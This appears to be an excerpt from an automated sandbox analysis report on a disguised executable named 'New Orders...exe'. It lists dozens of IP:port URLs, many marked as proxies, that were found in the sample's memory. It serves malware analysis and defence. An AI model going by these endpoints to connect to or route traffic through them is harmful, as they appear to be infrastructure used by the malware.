                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.118:54924://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.118:58703
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.118:58703://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.167:36193
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.167:36193://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.36:21355
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.36:21355://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.47:13916
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.47:13916://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.49:47354
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.49:47354://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.50:40080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.50:40080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.50:59268
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.50:59268://proxyb2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.50:59268X2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.22.28.62:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.22.28.62:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.23:57676
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.23:57676://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.83:56370
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.83:56370://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:15143
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:15143://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639p
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:28847
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:10049
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:10049://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:13537
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:13537://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:14751
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:14751://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:23973
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:2411
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:2411://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29852000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD297FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:25127
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD297D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:25127://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:28723
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:28723://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:4711
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:4711://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:13141
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:13141://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:19599
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:19599://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:26353
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:26353://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:9039
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:9039://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD262FD000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.229:29003
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.229:29003://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:25491
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:25491://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18003
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18003://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:11339
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:11339://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:24279
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:24279://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:26087
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:26087://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29B32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:28695
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:28695://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:4495
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.252:4495://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14493
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14493://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14869
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14869://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:26087
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:26087://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:31033
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:31033://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:3933
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:3933://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27045000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:5633
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:5633://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:6879
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:6879://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:7853
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:7853://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:9827
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:9827://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:28971
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:28971://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:28971P
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:32221
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.254:32221://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.1
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:13087
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:13087://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:17145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:17145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:22645
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:22645://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:30333
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.18:30333://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25B72000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25B94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10363
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25B7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:10363://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2659D000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:13175
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD265AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:13175://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:16829
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:16829://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:18129
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:18129://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:20001
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:20001://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:24725
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD298E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:25917
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD298E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:25917://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:26693
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:26693://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:31295
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:31295://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:31733
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:31733://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:3335
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:3335://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:6705
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.20:6705://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.21:29477
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.21:29477://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.22:14325
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.22:14325://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.22:2211
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.236.22:2211://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.1.210.163:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.1.210.163:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.169.60.220:8380
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.169.60.220:8380://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.143.134
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.180.222:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.183.180.222:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.185.57.66:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.188.59.198
